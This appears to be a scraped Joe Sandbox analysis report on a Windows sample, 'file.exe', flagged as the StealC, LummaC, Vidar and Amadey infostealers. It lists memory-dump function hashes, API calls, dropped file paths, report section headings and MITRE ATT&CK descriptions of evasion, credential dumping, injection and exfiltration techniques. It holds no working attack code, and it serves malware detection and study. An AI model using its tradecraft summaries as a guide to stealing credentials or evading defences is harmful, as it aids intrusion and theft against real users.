Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: free$mallocmemset
String ID:
API String ID: 2682772760-0
Opcode ID: 9d0cb283bc82062c7ba646cca59b8875040ab303dc030259fb20ca2fe54521f5
Instruction ID: e371592954ce6d95cd396fc7cd4bd3d1e7b94cef08ec2093662575845ff6eb09
Opcode Fuzzy Hash: 9d0cb283bc82062c7ba646cca59b8875040ab303dc030259fb20ca2fe54521f5
Instruction Fuzzy Hash: 96516D725087409FD700CF29C8D071AFBE9EF89318F04C96EE9899B266D778D945CB62

Function 6BF623D8 Relevance: 5.1, APIs: 4, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 54bbe5deb1cbe4d5e6b1ea78dbc52ea5f7677ff553e39bbda418d516bc4b6cb1
Instruction ID: be33230f7798528528c3cc90a58b509ddd3c2969c66c9445ea4c0db042976105
Opcode Fuzzy Hash: 54bbe5deb1cbe4d5e6b1ea78dbc52ea5f7677ff553e39bbda418d516bc4b6cb1
Instruction Fuzzy Hash: D25181B2A00206CFDB04CF28C89475ABBB1BF44354F158269DD19DB3A2E776E895CB90

Function 6BFB6180 Relevance: 5.1, APIs: 4, Instructions: 107COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000024), ref: 6BFB61DD
memcpy.VCRUNTIME140(00000000,00000024,-00000070), ref: 6BFB622C
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001), ref: 6BFB6250
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BFB6292

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 79c4699910613bfd7e67e07317a808ee9388e20483923f68b8d2e85ed9333b46
Instruction ID: 55e697e834fb0650a2929e7ce3d4e33d84600463f9196e04732a35b0a29b3008
Opcode Fuzzy Hash: 79c4699910613bfd7e67e07317a808ee9388e20483923f68b8d2e85ed9333b46
Instruction Fuzzy Hash: 4E310773A0060A9FEB04CF2DD880BAAB3E9FF95304F108579D55AD7261EB35E598CB50

Function 6BF6BBE0 Relevance: 5.1, APIs: 4, Instructions: 96COMMON

Download Yara Rule

APIs

malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000010,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BF6BBF4
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000001,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BF6BC66
free.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000008), ref: 6BF6BC96
memcpy.VCRUNTIME140(00000000,00000010,0000001F,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6BF6BCCE

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: malloc$freememcpy
String ID:
API String ID: 4259248891-0
Opcode ID: 3d64f025ea2df9bc68d29a1eb7f089646cb27efdca5fbdcb16b7993ceb768e7f
Instruction ID: 89bddffabcbbd86917dde95186fd1bda60e48f6450c3802758186a63de88129a
Opcode Fuzzy Hash: 3d64f025ea2df9bc68d29a1eb7f089646cb27efdca5fbdcb16b7993ceb768e7f
Instruction Fuzzy Hash: 6421F273A002054BF7008E3D988676A73E9EB82384F144E39ED56D7362FE74E6848261

Function 6BF539A0 Relevance: 5.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

EnterCriticalSection.KERNEL32(6BFDE744,6BFB7765,00000000,6BFB7765,?,6BF76112), ref: 6BF539AF
LeaveCriticalSection.KERNEL32(6BFDE744,?,6BF76112), ref: 6BF53A34
EnterCriticalSection.KERNEL32(6BFDE784,6BF76112), ref: 6BF53A4B
LeaveCriticalSection.KERNEL32(6BFDE784), ref: 6BF53A5F

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: CriticalSection$EnterLeave
String ID:
API String ID: 3168844106-0
Opcode ID: 0c76e213f5da0855b516fb93f9eed7f7b99a4ccf453e13e5ef974725ab34bd84
Instruction ID: 0b915d6590012db0ea5216287de8ba32e52bebd715c5a228240f53f2a282a01c
Opcode Fuzzy Hash: 0c76e213f5da0855b516fb93f9eed7f7b99a4ccf453e13e5ef974725ab34bd84
Instruction Fuzzy Hash: 2E210537611B024FCB258F79C441B26B3A1EFD6760718062DC56683B70D739E8058792

Function 6BF6B940 Relevance: 5.1, APIs: 4, Instructions: 64COMMON

Download Yara Rule

APIs

memcpy.VCRUNTIME140(?,?,?), ref: 6BF6B96F
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(00000020), ref: 6BF6B99A
memcpy.VCRUNTIME140(00000000,?,?), ref: 6BF6B9B0
free.API-MS-WIN-CRT-HEAP-L1-1-0(?), ref: 6BF6B9B9

Memory Dump Source

Source File: 00000006.00000002.2674334037.000000006BF51000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6BF50000, based on PE: true

Associated: 00000006.00000002.2674306385.000000006BF50000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674484590.000000006BFCD000.00000002.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674525930.000000006BFDE000.00000004.00000001.01000000.0000000D.sdmpDownload File
Associated: 00000006.00000002.2674577439.000000006BFE2000.00000002.00000001.01000000.0000000D.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_6bf50000_stealc_default2.jbxd

Similarity

API ID: memcpy$freemalloc
String ID:
API String ID: 3313557100-0
Opcode ID: 90238676d5002c24cb492c0f746dfbd7af6f2d283574b6077448e7122ccd664e
Instruction ID: da678ea791fb4a051c228bfb90b7f0004ee0642c5b6162cbd2a1e6d1d10920df
Opcode Fuzzy Hash: 90238676d5002c24cb492c0f746dfbd7af6f2d283574b6077448e7122ccd664e
Instruction Fuzzy Hash: B91172B2A002069FCB04CF69D88189BB7F8BF88354B10493AE919D3311E735E915CAA1

Description:	This technique has been deprecated. Please use Command and Scripting Interpreter where appropriate.
Tactics:	Defense Evasion, Execution
Data Sources:
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to execute malicious commands and payloads. WMI is an administration feature that provides a uniform environment to access Windows system components. The WMI service enables both local and remote access, though the latter is facilitated by Remote Services such as Distributed Component Object Model (DCOM) and Windows Remote Management (WinRM).Remote WMI over DCOM operates using port 135, whereas WMI over WinRM operates over port 5985 when using HTTP and 5986 for HTTPS.
Tactics:	Execution
Data Sources:	Command: Command Execution, Network Traffic: Network Connection Creation, Process: Process Creation, WMI: WMI Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse command and script interpreters to execute commands, scripts, or binaries. These interfaces and languages provide ways of interacting with computer systems and are a common feature across many different platforms. Most systems come with some built-in command-line interface and scripting capabilities, for example, macOS and Linux distributions include some flavor of Unix Shell while Windows installations include the Windows Command Shell and PowerShell .
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Network, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse PowerShell commands and scripts for execution. PowerShell is a powerful interactive command-line interface and scripting environment included in the Windows operating system.Adversaries can use PowerShell to perform a number of actions, including discovery of information and execution of code. Examples include the `Start-Process` cmdlet which can be used to run an executable and the `Invoke-Command` cmdlet which runs a command locally or on a remote computer (though administrator permissions are required to use PowerShell to connect to remote systems).
Tactics:	Execution
Data Sources:	Command: Command Execution, Module: Module Load, Process: Process Creation, Process: Process Metadata, Script: Script Execution
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may achieve persistence by adding a program to a startup folder or referencing it with a Registry run key. Adding an entry to the "run keys" in the Registry or startup folder will cause the program referenced to be executed when a user logs in.These programs will be executed under the context of the user and will have the account's associated permissions level.
Tactics:	Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, File: File Modification, Process: Process Creation, Windows Registry: Windows Registry Key Creation, Windows Registry: Windows Registry Key Modification
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of valid accounts, usernames, or email addresses on a system or within a compromised environment. This information can help adversaries determine which accounts exist, which can aid in follow-on behavior such as brute-forcing, spear-phishing attacks, or account takeovers (e.g., Valid Accounts ).
Tactics:	Discovery
Data Sources:	Command: Command Execution, File: File Access, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report file.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: StealC

Threatname: LummaC

Threatname: Vidar

Threatname: Amadey

Yara Signatures

Dropped Files

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Data Obfuscation

HIPS / PFW / Operating System Protection Evasion

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Cryptography

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

Spam, unwanted Advertisements and Ransom Demands

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\ProgramData\AKEGDHJD

C:\ProgramData\BKECAEBG

C:\ProgramData\DBFIDGIIIJDBGDGDAKKFCGCGID

C:\ProgramData\FCGIJKJJKEBGHJKFIDGC

Windows Analysis Report
file.exe

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Valid Accounts to log into a computer using the Remote Desktop Protocol (RDP). The adversary may then perform actions as the logged-on user.
Tactics:	Lateral Movement
Data Sources:	Logon Session: Logon Session Creation, Logon Session: Logon Session Metadata, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Flow, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may collect data stored in the clipboard from users copying information within or between applications.
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre